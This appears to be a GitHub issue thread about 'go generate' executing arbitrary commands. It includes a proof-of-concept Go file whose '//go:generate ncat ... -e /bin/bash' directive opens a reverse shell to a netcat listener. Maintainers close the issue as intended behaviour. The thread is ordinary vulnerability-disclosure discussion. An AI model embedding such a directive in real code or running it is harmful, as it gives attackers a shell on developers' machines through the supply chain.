Maybe it's not a bug, it's the expected behavior, but it's the way of RCE（Remote Command Execution） attack in the supply chain

[hktalent]

The go generate command does not conduct security check. When compiling the associated malicious library and code, it may cause the execution of the "//go:generate [malicious command]"

Impact

1、hacker run

nc -lv 4444

2、POC

testRce.go
Code 152 BytesWrap lines Copy Download
package main

import (
       "fmt"
)
//go:generate ncat 127.0.0.1 4444 -e /bin/bash
func main() {
fmt.Println("test go:generate remote command execution ")
}

3、run build

go generate -x testRce.go

4、test command execution

in "nc -lv 4444" console

Attack scenario:
People who provide golang open source libraries and projects may embed malicious commands, causing users to trigger commands during compilatio

[hktalent]

In any case, with open source libraries flying everywhere, supply chain security has become urgent and needs better mechanisms to ensure it

[zigo101]

go generate may run any commands. It is the user's duty to decide whether or not to run go generate.

[hktalent]

@go101 I know,But in the whole ecology, there are risks
There are too many open sources and complex dependencies. Think carefully about the supply chain attacks that are extremely feared

[zigo101]

The go generate command does not conduct security check.

This is an impossible task for go generate.

Do you mean the docs of go generate should mention the risk in a more obvious manner?

Currently, the docs says

Generate runs commands described by directives within existing
files. Those commands can run any process but the intent is to
create or update Go source files.

Go generate is never run automatically by go build, go test,
and so on. It must be run explicitly.

[mdlayher]

See above, it is up to the user to decide when to run go generate. Closing.